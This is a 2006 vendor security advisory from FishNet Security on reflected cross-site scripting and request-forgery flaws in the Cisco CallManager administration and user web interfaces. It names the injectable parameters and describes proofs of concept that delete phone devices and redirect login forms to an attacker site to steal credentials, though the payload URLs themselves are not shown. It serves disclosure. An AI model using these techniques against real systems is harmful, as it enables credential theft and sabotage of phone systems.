Founded in 1996, FishNet Security has become one of the country's leading and most respected innovators in the network security industry. FishNet Security is focused exclusively on network security. Our roots are grounded in the engineering and technical aspects of network security as opposed to consulting firms that have ventured resources into the network security arena. Our business foundations offer strength and stability that set us apart from the "dot-com" model.
Headquartered in Kansas City, Missouri, FishNet Security is committed to being the largest network security company in the Midwest. In order to provide superior customer service, FishNet Security has regional offices in St. Louis, Dallas, Minneapolis, Boston, Denver, Ohmaha, New York City, Los Angeles, Phoenix, San Diego, Seattle, Livermore, Sacramento, Raleigh, Park City, Philadelphia, and Banglore India. Our management team works to ensure a high level of service through frequent and direct contact with our customers.
FishNet Security offers a technical staff with experience, training and industry certifications such as Check Point Certified Security Expert, Cisco Certified Internetwork Engineer (CCIE), Certified Information System Security Professional, Microsoft Certified System Engineer and more. Our engineers are certified in industry leading security product lines, and in the networking, operating system and routing foundations that underscore successful implementations.
The FishNet Security Vulnerability Research Team is comprised of highly technical employees and is designed to be flexible to meet the varying needs of FishNet and our clients. The following individuals participated in the vulnerability research on this project:
| Jake Reynolds, Senior Security Engineer |
|---|
| Initial vulnerability discovery, exploit development, and threat analysis |
|
Office: +1 (816) 421.6611 Cell: +1 (913) 710.1986 Email: jake.reynolds@fishnetsecurity.com |
| Arian Evans, Senior Security Engineer |
|---|
| Threat analysis |
|
Office: +1 (816) 421.6611 Cell: +1 (913) 710.7085 Email: arian.evans@fishnetsecurity.com |
The web interface used to administer Cisco CallManager software suffers from a lack of input validation and output encoding. As a result, an attacker could craft a request that causes the CallManager web interface to include malicious JavaScript in its response. If a victim can be made to submit this specially crafted request, the response will be processed, and the malicious JavaScript payload executed in the browser of the victim.
If such a request is provided to CallManager administrators (either in an email or embedded in an html resource using something like an automatic redirect) an attacker can perform a variety of nefarious actions. Depending on the scripted payload, these attacks are commonly referred to as cross-site scripting (XSS), session riding, and cross-site request forgery (CSRF). Potential threats that can be realized through these vulnerabilities could include but are not limited to:
The web interfaces used to administer Cisco CallManager exhibit input validation/output encoding vulnerabilities throughout the applications. Specifically, the "Cisco CallManager Administration" and "Cisco CallManager User Options" interfaces contain multiple instances of these vulnerabilities. This advisory will focus on a subset of those vulnerabilities that allow attack execution from an unauthenticated perspective. Not all vulnerability instances will be included.
The Cisco CallManager Administration (http://CallManagerAddress/ccmadmin/) web interface contains parameters that have their user-supplied input returned in subsequent responses without being properly encoded. Although this interface requires basic authentication before access to the vulnerable parameters is granted, the original request will be sent to the server after successful authentication. Thus, reflected script injection is possible if the attacker can lure a CallManager administrator into entering their credentials upon being presented with the basic authentication box. The URL below takes advantage of the vulnerable "pattern" parameter that returns user-supplied input at several points within the subsequent responses.
A simple proof of concept script has been written that utilizes XMLHTTP to search for devices and delete them from the CallManager configuration. Prior knowledge of the CallManager configuration would allow for more savvy attacks that could intelligently reconfigure the phone system.
The Cisco CallManager User Options (http://CallManagerAddress/ccmuser/) web interface also contains vulnerable parameters. Most notably, arbitrary parameters included in requests to /ccmuser/logon.asp are returned by the application without proper input validation or output encoding. The URL below takes advantage of this behavior by appending the parameter "MadeUpParameter", escaping the form included in the response, and rewriting all form actions to point to an attacker site that collects all input. The application seems to remove the '+' character used to post-increment the loop counter so URL hex encoding (%2B) was used to obfuscate it.
By luring phone system users into making the above request and logging in, an attacker can steal their credentials.
In all cases, there is some prerequisite information that an attacker must have. The address of the CallManager is obviously a necessity in order to correctly craft malicious requests. This could be easily gained internally by viewing the network configuration on the IP phones that register with the targeted CallManager unless the display of this information has been disabled. Social engineering could allow an attacker to gain this information from inside or outside of the organization. It is important to note that while the address of the target CallManager is required, the attacker does not require connectivity. Reflected script injection attacks only require that the victim has connectivity to the vulnerable application, since the victim is the entity that makes the malicious request, causing unwanted execution of the script included in the vulnerable server’s response.
Any intelligent reconfiguration of Cisco CallManager using CSRF attacks as mentioned above would require knowledge of the current CallManager configuration. However, a significant amount of damage could be inflicted by an XMLHTTP-based script that searches for and deletes all devices without prior knowledge of the current CallManager configuration.
Exploitation of the "Call Manager User Options" logon page does not require connectivity to the target CallManager. However, the use of stolen credentials gained through such an attack would require connectivity to a system that utilizes them. This system, in many cases might only be the CallManager itself. However, in the case of CallManager integration with another directory such as iPlanet or Active directory, credential theft could lead to an attacker gaining access to many other services.
You can reach the author of this advisory by emailing jake.reynolds@fishnetsecurity.com. Media professionals, please contact Jon Forbis at (888) 732.9406 or by email at jon.forbis@fishnetsecurity.com
You can view Cisco's official response to this advisory here.
Copyright 2006, FishNet Security, Inc., All Rights Reserved